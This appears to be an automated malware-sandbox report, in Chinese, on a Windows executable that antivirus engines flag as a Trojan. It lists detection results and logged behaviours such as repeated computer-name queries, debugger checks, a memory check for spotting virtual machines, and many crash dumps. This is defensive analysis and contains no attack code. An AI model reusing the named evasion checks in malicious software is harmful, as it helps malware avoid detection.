4.7
中危

0b44c8584bddf1d00373b21ad43cf8e73564b498215ec1709209d5d71f02d46b

0b44c8584bddf1d00373b21ad43cf8e73564b498215ec1709209d5d71f02d46b.exe

分析耗时

134s

最近分析

382天前

文件大小

78.5KB
静态报毒 动态报毒 CVE FAMILY METATYPE PLATFORM TYPE UNKNOWN WIN32 TROJAN RANSOM URSUMDTAC
鹰眼引擎
DACN 0.14
FACILE 1.00
IMCLNet 0.92
MFGraph 0.00
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
Alibaba None 20190527 0.3.0.5
Avast Win32:Agent-AVLJ [Trj] 20200710 18.4.3895.0
Baidu None 20190318 1.0.0.2
CrowdStrike win/malicious_confidence_100% (D) 20190702 1.0
Kingsoft None 20200710 2013.8.14.323
McAfee GenericRXDE-PH!C03AC1DB0EBB 20200710 6.0.6.653
Tencent None 20200710 1.0.0.1
静态指标
查询计算机名称 (50 out of 265 个事件)
Time & API Arguments Status Return Repeated
1727545339.34375
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545343.09375
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545343.20375
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545343.21875
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545343.25075
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545343.26575
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545343.26575
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545345.00075
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545345.01575
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545345.01575
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545345.03175
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545345.04675
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545345.04675
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545346.53175
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545346.54675
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545346.54675
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545346.56275
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545346.57875
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545346.57875
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545348.07875
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545348.07875
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545348.09375
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545348.10975
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545348.10975
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545348.10975
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545349.59375
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545349.60975
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545349.60975
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545349.62575
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545349.64075
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545349.64075
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545351.12575
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545351.14075
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545351.14075
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545351.15675
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545351.15675
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545351.17175
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545352.64075
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545352.65675
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545352.65675
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545352.67175
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545352.68775
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545352.68775
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545354.17175
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545354.18775
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545354.18775
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545354.20375
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545354.20375
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545354.21875
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545355.68775
GetComputerNameW
computer_name: TU-PC
success 1 0
检查进程是否被调试器调试 (2 个事件)
Time & API Arguments Status Return Repeated
1727545330.531875
IsDebuggerPresent
failed 0 0
1727545332.73475
IsDebuggerPresent
failed 0 0
检查系统中的内存量,这可以用于检测可用内存较少的虚拟机 (1 个事件)
Time & API Arguments Status Return Repeated
1727545404.31275
GlobalMemoryStatusEx
success 1 0
一个或多个进程崩溃 (50 out of 88 个事件)
Time & API Arguments Status Return Repeated
1727545343.54675
__exception__
exception.address: 0x8412fe
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 43 c9 aa 6c eb 11 8b c8 e8 a2 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 0
registers.ecx: 0
registers.edx: 0
registers.ebx: 40148980
registers.esp: 90828760
registers.ebp: 90828792
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545343.54675
__exception__
exception.address: 0x84131e
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 23 c9 aa 6c eb 11 8b c8 e8 82 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 8655640
registers.ecx: 0
registers.edx: 90828760
registers.ebx: 40148980
registers.esp: 90828760
registers.ebp: 90828792
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545345.06275
__exception__
exception.address: 0x8412fe
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 43 c9 aa 6c eb 11 8b c8 e8 a2 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 0
registers.ecx: 0
registers.edx: 0
registers.ebx: 40148980
registers.esp: 90828584
registers.ebp: 90828616
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545345.06275
__exception__
exception.address: 0x84131e
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 23 c9 aa 6c eb 11 8b c8 e8 82 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 8655640
registers.ecx: 0
registers.edx: 90828584
registers.ebx: 40148980
registers.esp: 90828584
registers.ebp: 90828616
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545346.59375
__exception__
exception.address: 0x8412fe
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 43 c9 aa 6c eb 11 8b c8 e8 a2 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 0
registers.ecx: 0
registers.edx: 0
registers.ebx: 40148980
registers.esp: 90828408
registers.ebp: 90828440
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545346.60975
__exception__
exception.address: 0x84131e
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 23 c9 aa 6c eb 11 8b c8 e8 82 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 8655640
registers.ecx: 0
registers.edx: 90828408
registers.ebx: 40148980
registers.esp: 90828408
registers.ebp: 90828440
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545348.14075
__exception__
exception.address: 0x8412fe
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 43 c9 aa 6c eb 11 8b c8 e8 a2 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 0
registers.ecx: 0
registers.edx: 0
registers.ebx: 40148980
registers.esp: 90828232
registers.ebp: 90828264
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545348.14075
__exception__
exception.address: 0x84131e
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 23 c9 aa 6c eb 11 8b c8 e8 82 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 8655640
registers.ecx: 0
registers.edx: 90828232
registers.ebx: 40148980
registers.esp: 90828232
registers.ebp: 90828264
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545349.67175
__exception__
exception.address: 0x8412fe
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 43 c9 aa 6c eb 11 8b c8 e8 a2 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 0
registers.ecx: 0
registers.edx: 0
registers.ebx: 40148980
registers.esp: 90828056
registers.ebp: 90828088
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545349.67175
__exception__
exception.address: 0x84131e
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 23 c9 aa 6c eb 11 8b c8 e8 82 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 8655640
registers.ecx: 0
registers.edx: 90828056
registers.ebx: 40148980
registers.esp: 90828056
registers.ebp: 90828088
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545351.18775
__exception__
exception.address: 0x8412fe
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 43 c9 aa 6c eb 11 8b c8 e8 a2 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 0
registers.ecx: 0
registers.edx: 0
registers.ebx: 40148980
registers.esp: 90827880
registers.ebp: 90827912
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
